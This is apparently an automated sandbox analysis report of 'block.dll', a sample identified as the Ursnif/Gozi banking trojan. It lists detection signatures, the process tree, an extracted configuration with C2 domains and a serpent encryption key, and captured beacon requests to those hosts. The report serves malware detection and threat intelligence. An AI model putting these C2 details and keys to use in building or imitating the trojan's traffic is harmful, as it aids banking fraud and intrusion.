Loading ...

Play interactive tourEdit tour

Analysis Report block.dll

Overview

General Information

Sample Name:block.dll
Analysis ID:403080
MD5:5a7c87dab250cee78ce63ac34117012b
SHA1:554c4ccf2341182768d475087d8a8bcfaa525a12
SHA256:8a26c32848c9ea085505359f67927d1a744ec07303ed0013e592eca6b4df4790
Tags:DLLGoziISFBUrsnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Ursnif
Yara detected Ursnif
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 5720 cmdline: loaddll32.exe 'C:\Users\user\Desktop\block.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 4516 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\block.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5752 cmdline: rundll32.exe 'C:\Users\user\Desktop\block.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5592 cmdline: rundll32.exe C:\Users\user\Desktop\block.dll,Pape1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4648 cmdline: rundll32.exe C:\Users\user\Desktop\block.dll,Riverslow MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 5856 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6328 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5856 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6452 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5856 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5708 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5816 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5708 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 6100 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5708 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6616 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6480 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 1972 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:17414 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "8oKmD0Ib40VYxHRgT7OnHwlxmK3U2F2Fl3GpR9KrKxvSCrIeiCLZWlQ2QCt+AnP+N5tCnTTv45/b0/D8Eb4xqxiXBnUy/ADWorQScIoNIPfBQqutzO+Ozy/mev4m2eZAuMivS2UNJVH4DVsYsAkGAC4GR+aszytDfGSZp3MklfgRJ6Noj034BrS4tQl5qmeWhJa+Of/CLdmkCwJurSEhMKu3NK7g4EVzni8lIJrDkWNCTaVL4CWXewbAOJFPwh8Y/20KkHTZmVKLmJJRcSj8yyH0avZDtWvJHRDxiI+JYUar2ia3phWwtqVzVhzYzz8aoUVzmlt840TF55o2e8TRUCEZNNmvmluqgNZzQuNIj68=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "1500", "server": "580", "serpent_key": "ZQktwkM8O9lYn9oX", "sleep_time": "10", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.353402660.0000000005A48000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000004.00000003.353461083.0000000005A48000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000001.00000003.352720988.0000000003D28000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000001.00000003.352839215.0000000003D28000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000001.00000003.352637772.0000000003D28000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 17 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.3.loaddll32.exe.1678d29.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              4.3.rundll32.exe.3058d29.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                4.2.rundll32.exe.6dd30000.3.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  1.2.loaddll32.exe.6dd30000.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    3.3.rundll32.exe.3f58d29.0.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 1 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 5.3.rundll32.exe.4d58d29.0.raw.unpackMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "8oKmD0Ib40VYxHRgT7OnHwlxmK3U2F2Fl3GpR9KrKxvSCrIeiCLZWlQ2QCt+AnP+N5tCnTTv45/b0/D8Eb4xqxiXBnUy/ADWorQScIoNIPfBQqutzO+Ozy/mev4m2eZAuMivS2UNJVH4DVsYsAkGAC4GR+aszytDfGSZp3MklfgRJ6Noj034BrS4tQl5qmeWhJa+Of/CLdmkCwJurSEhMKu3NK7g4EVzni8lIJrDkWNCTaVL4CWXewbAOJFPwh8Y/20KkHTZmVKLmJJRcSj8yyH0avZDtWvJHRDxiI+JYUar2ia3phWwtqVzVhzYzz8aoUVzmlt840TF55o2e8TRUCEZNNmvmluqgNZzQuNIj68=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "1500", "server": "580", "serpent_key": "ZQktwkM8O9lYn9oX", "sleep_time": "10", "SetWaitableTimer_value": "10"}
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_033D35A1 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,4_2_033D35A1
                      Source: block.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
                      Source: Binary string: c:\Whether\class\156\Through\How.pdb source: block.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_033D4E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,4_2_033D4E9C
                      Source: global trafficHTTP traffic detected: GET /u9JBOXOyCt1J/Cqk3pF0_2B2/evko0P1iOLkfYu/tE8kijPwXl6fpTUvGY0L0/uKSRiZsz1TrVOn7H/lYNbZbDXpFfEDld/SZEdzjQiJ4mBJjhxQf/lliemLK4E/fjiV_2FMKJMbBd5i_2F6/V_2Fz7Tym384w5xw_2F/kNwSikyIWBdKPim7R9vGWb/gFLpN9hJBqDsa/ZkxxO_2B/g7xuaBcPsCTSbIA7GEQ7zhu/w_2FuzPVom/0RGTspDSMbay7GsRJ/O_2BvpZGrQEs/hpy5azZaVzk/tO8Yj0mAC2rNEA/7Y_2FaW8HQeMqJNFtj5QK/iv0XWUt_2F3/3R HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app.buboleinov.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /zWr7XKiLQ_2F3QZ2bR/ZuzwfgbmQ/mjgvv5jUliwpj1wMmSf1/mVwZRrRJ02ozj18W4CC/_2FqTc0J0ACZs0Zo0yB15V/UkO_2BhXUEjqi/ylcme0uu/h88DPxTz52fwzk2KiAITqAX/y1YkE9ueOd/NzFODbcfeCN_2B548/9jGMMg_2FjQB/TCcN38_2FLl/w78Mf5LsU18OtD/O9ldbeaIz2YOBBV9govEw/if1bIKJhIzR9fYIT/Dva1E7_2F2LcgBj/3WJFp2Il273lx9FN_2/B45JK5S6v/rZZWdDOKWu65eMI2rNKK/RAsOHyLCy3eKhZf_2Fm/CD_2FuANPfLuHGjULRoA2Y/Paqy HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app.buboleinov.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /hPJ75Rz1l0Yg172f0/W92Rc6NrZORu/agJ84T4GWPF/71Su9Jrd5ILrko/1XWo5CLa_2Bx1ycL2fXGF/76IsZupbi6IIIogp/P_2BrqGlfT6Z_2F/9HIF9QL_2Ffn95EjHz/EKpbgAout/m_2FkBfNGzNFhXOxCcqe/1zQKvOOwqE_2B22qrZS/vj3rmMMb_2BsLkd2AZhDC4/602lvjtm6dYcP/dyzgfgBT/A_2BC4eofqol5orEsMEQPWe/zZ6Swnuj_2/FM3kwbNjGbF9dztKO/5Sul25wMK_2F/fSrDDmSQa3P/LwvXQje5tWHJ24/YCtfl_2Bd9Wgni_2B/yKHW HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: chat.billionady.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /1Z7Zv_2Fo_2BBI/5yyu9xO7U6xQJUAU9LBdU/_2BZsJzv4AW1v4_2/FuBHkCgtXKYNI2J/fjLUpx4yvdGQ9xBWU8/nZ2UCR2Fn/6_2BJUjWbSDTFYEq01IK/G2MuJJozgl6fI_2Bxi6/8WHocMwy1m3c6beo7EybdT/0fZNT0A7jOYrz/ZJgKKaGn/V_2Bc6nIeAMBXcBQSTKS3tI/dRpB7HoFuq/5r0h_2Bic5oCoaHxQ/GZIQmnaYFeN7/lgmkXjg8R1P/o6CJiUeiWxo9TA/Om1BRSx_2BLEYhxw_2B1w/ztx7Xd1V_2BwFgLL/5ttSiFJbfjzPnDR/nMd_2BdWk4HTz_2Ftn/Va7N0lfshKE/mKz HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: chat.billionady.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /cDNEPwBarUn/ROJH1XYkRfSClQ/qONBPlQo8FxG6mQW9Ogcz/u7mo1Dj2PullrRPq/bR_2BFpPLx7OhU9/HJBhAhHBzmstPPDOE1/w6ebBa_2B/KX_2BOm6FIW3gd6Bvbnj/Sh9h8HN_2BONCwGgPQr/IY0nkmO9u18wIpqrmMTW3z/GWi0vHa3h_2Bj/6IH92Uhj/Iom39I56_2BMfY2_2BRDxU0/VfXOZ9_2BQ/hDbFynpSdJTA10_2B/DTN9zUXGBVIL/6pinDdbjTIZ/J8liN5BZT7oU_2/FDetd44m1Cdm74WjgwpWw/7RPnYCrU0gXGaG9w/dolpQdALprU5fVz/g9lnmYz4c/oMbk6u HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app3.maintorna.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /6r_2FD5QsDWTjJjwzHfBaL/2HYJ2K06UlseV/lZ1msT18/ny_2FHLDol8VG6VjuFqLZ26/y1nZcgTjUQ/HL5YV0taxU5zFMebw/ouCjKnY1SB67/bctA52f0140/sHpnVH95T_2Fuj/QLIAvGeVws2XTmrrXV3BZ/psxvZSZg2i7jPF9N/caz3S5QCjepHp3W/l6q5V6Mw_2BHygdAjz/QFWLuSVDY/2iEYyTYQm6wj63ekurFy/nVWvwQ5A_2FY6vAZ0b2/ysxIi7hdttfqNZtbDq2s51/_2FLPh7LrbbPo/JhDaZ4qW/MGAYB_2BvyA3HE7Ywiz/pWy HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app3.maintorna.comConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: app.buboleinov.com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 03 May 2021 16:47:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
                      Source: ~DF036A3D1EB4248F1E.TMP.19.dr, {A33D02D2-AC7A-11EB-90E5-ECF4BB570DC9}.dat.19.drString found in binary or memory: http://app.buboleinov.com/u9JBOXOyCt1J/Cqk3pF0_2B2/evko0P1iOLkfYu/tE8kijPwXl6fpTUvGY0L0/uKSRiZsz1TrV
                      Source: {A33D02D4-AC7A-11EB-90E5-ECF4BB570DC9}.dat.19.drString found in binary or memory: http://app.buboleinov.com/zWr7XKiLQ_2F3QZ2bR/ZuzwfgbmQ/mjgvv5jUliwpj1wMmSf1/mVwZRrRJ02ozj18W4CC/_2Fq
                      Source: ~DFE60F766B8C74F7D6.TMP.36.dr, {CDCCBAD9-AC7A-11EB-90E5-ECF4BB570DC9}.dat.36.drString found in binary or memory: http://app3.maintorna.com/6r_2FD5QsDWTjJjwzHfBaL/2HYJ2K06UlseV/lZ1msT18/ny_2FHLDol8VG6VjuFqLZ26/y1nZ
                      Source: {CDCCBAD7-AC7A-11EB-90E5-ECF4BB570DC9}.dat.36.dr, ~DF7FEBD80971BE8B6A.TMP.36.drString found in binary or memory: http://app3.maintorna.com/cDNEPwBarUn/ROJH1XYkRfSClQ/qONBPlQo8FxG6mQW9Ogcz/u7mo1Dj2PullrRPq/bR_2BFpP
                      Source: {BF692A67-AC7A-11EB-90E5-ECF4BB570DC9}.dat.29.dr, ~DF183688B2D13937F7.TMP.29.drString found in binary or memory: http://chat.billionady.com/1Z7Zv_2Fo_2BBI/5yyu9xO7U6xQJUAU9LBdU/_2BZsJzv4AW1v4_2/FuBHkCgtXKYNI2J/fjL
                      Source: {BF692A65-AC7A-11EB-90E5-ECF4BB570DC9}.dat.29.drString found in binary or memory: http://chat.billionady.com/hPJ75Rz1l0Yg172f0/W92Rc6NrZORu/agJ84T4GWPF/71Su9Jrd5ILrko/1XWo5CLa_2Bx1yc

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000001.00000003.299036321.0000000001670000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.294762520.0000000004D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.286919905.0000000003050000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.285453583.0000000003F50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 1.3.loaddll32.exe.1678d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.3058d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6dd30000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.6dd30000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.3f58d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d58d29.0.raw.unpack, type: UNPACKEDPE
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000004.00000003.353402660.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353461083.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352720988.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352839215.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352637772.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353493626.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353527674.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353601646.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353567176.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352699094.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352816951.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352743659.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353611757.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352664971.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352761373.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353343104.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5720, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5752, type: MEMORY

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000001.00000003.299036321.0000000001670000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.294762520.0000000004D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.286919905.0000000003050000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.285453583.0000000003F50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 1.3.loaddll32.exe.1678d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.3058d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6dd30000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.6dd30000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.3f58d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d58d29.0.raw.unpack, type: UNPACKEDPE
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000004.00000003.353402660.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353461083.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352720988.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352839215.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352637772.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353493626.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353527674.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353601646.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353567176.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352699094.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352816951.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352743659.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353611757.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352664971.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352761373.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353343104.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5720, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5752, type: MEMORY
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_033D35A1 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,4_2_033D35A1

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD318D1 GetProcAddress,NtCreateSection,memset,1_2_6DD318D1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD31B89 NtMapViewOfSection,1_2_6DD31B89
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD32485 NtQueryVirtualMemory,1_2_6DD32485
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_033D3CA1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,4_2_033D3CA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_033D81CD NtQueryVirtualMemory,4_2_033D81CD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD322641_2_6DD32264
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD7348A1_2_6DD7348A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD67AD71_2_6DD67AD7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_033D7FA84_2_033D7FA8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_033D66094_2_033D6609
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD7348A4_2_6DD7348A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD67AD74_2_6DD67AD7
                      Source: block.dllBinary or memory string: OriginalFilenameHow.dll8 vs block.dll
                      Source: block.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: classification engineClassification label: mal72.troj.winDLL@24/69@6/2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_033D19E7 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,4_2_033D19E7
                      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{A33D02D0-AC7A-11EB-90E5-ECF4BB570DC9}.datJump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF436970D6C9CDDC13.TMPJump to behavior
                      Source: block.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\block.dll,Pape1
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\block.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\block.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\block.dll,Pape1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\block.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\block.dll,Riverslow
                      Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5856 CREDAT:17410 /prefetch:2
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5856 CREDAT:17414 /prefetch:2
                      Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
